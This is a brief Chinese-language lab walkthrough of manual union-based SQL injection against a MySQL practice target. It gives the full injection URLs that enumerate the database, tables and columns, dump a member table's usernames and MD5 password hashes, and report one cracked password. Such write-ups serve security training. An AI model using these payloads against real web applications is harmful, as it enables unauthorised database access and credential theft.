SQL手工註入漏洞測試(MySQL資料庫) 的靶場練習 流程與方法 ...
SQL手工註入漏洞測試(MySQL資料庫) 的靶場練習 流程與方法
註意:加粗部分給重點
查詢資料庫名
http://219.153.49.228:46939/new_list.php?id=22 union select 1,database(),3,4 from information_schema.tables
獲取到的庫名
mozhe_Discuz_StormGroup
查詢庫下的表名
http://219.153.49.228:46939/new_list.php?id=-5 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'
獲取到的表名
StormGroup_member,notice
查詢表下的欄位
http://219.153.49.228:46939/new_list.php?id=-5 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'
獲取到的欄位名
id,name,password,status
查詢數據
http://219.153.49.228:46939/new_list.php?id=-5 union select 1,group_concat(id,0x5c,name,0x5c,password,0x5c,status),3,4 from StormGroup_member
得到的數據(ox5c為 \ 的16進位)
1\mozhe\356f589a7df439f6f744ff19bb8092c0\0,1\mozhe\4adef249540a3cb5d79c85f6ccc7ddb9\1
MD5解密得到密碼,經過測試有可用
4adef249540a3cb5d79c85f6ccc7ddb9
946377
